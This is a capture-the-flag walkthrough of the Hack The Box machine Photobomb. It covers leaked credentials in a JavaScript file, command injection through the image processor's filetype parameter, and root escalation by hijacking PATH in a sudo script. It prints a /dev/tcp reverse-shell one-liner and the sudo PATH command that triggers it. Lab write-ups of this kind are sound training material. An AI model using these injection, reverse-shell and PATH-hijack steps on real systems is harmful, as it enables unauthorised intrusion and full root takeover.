We are going to exploit Photobomb on Hackthebox.
After we inspected the Application we will find out that the Credentials for the enpoint /printer are leaked in a java script file.
To get a foothold we will exploit a command injection vulnerability in the image processor and escalate to root using sudo.
Enumeration
Rustscan
We will start by doing a quick scan using Rustscan and identify that Port 22 and 80 are open.
200 GET 7l 27w 339c http://photobomb.htb/photobomb.js
401 GET 7l 12w 188c http://photobomb.htb/printer
200 GET 22l 95w 843c http://photobomb.htb/
Website and Files
photobomb.js
Great we found credentials to visit the restricted section. There are two ways we can use that info
Set a cookie document.cookie="isPhotoBombTechSupport=1"
Use pH0t0:b0Mb! as credentials
function init() {
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
}
}
window.onload = init;
/printer
Exploitation
Shell
Burp will help us to enumerate that behavior and request we are sending to the application further. We will discover that the Application takes three parameters and we're sending a POST request to the image processor backend.
POST Request
That's how the POST Request looks like when we just hit Download photo to print.
After playing around we discover that the filetype paramter seems to behave akward when we add ;id for example. Instead of generating an Image we get the message Failed to generate a copy of finn-whelen-DTfhsDIWNSg-unsplash.jpg Let's get a shell by executing a payload and don't forget to URL encode it.
During enumeration there was a possible privilege escalation vector discovered. We are able to run /opt/cleanup.sh as root and have privileges to set an enviroment variable.
Sudo Privileges
(remote) wizard@photobomb:/home/wizard$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Privilege Escalation
Checking /opt/cleanup.sh reveals that find is called without an absolute path to the binary and relies on the PATH environment variable. Let's create a new folder called bin in our home directory, a binary called find in our new folder containing a reverse shell payload
find
bash -c 'bash -i >& /dev/tcp/10.10.10.1/81 0>&1
Make it executable and start cleanup.sh
sudo PATH=/home/wizard/bin:$PATH /opt/cleanup.sh
We will now receive a connection back on our listener and have a ROOT Shell
Last updated
When we visit the site we are greeted with a message that we have to click to get started. The credentials are in our welcome pack according to the site. Since we haven't received a "welcome pack" and get asked for a username and password on we inspect the application more and check photobomb.js
On visiting there's not much to discover except some images that we can select, setting the file type, a resolution and a buttong to download photo to print. That's exactly what happens when we select an image and hit Download photo to print, after some time we are able to download a file.
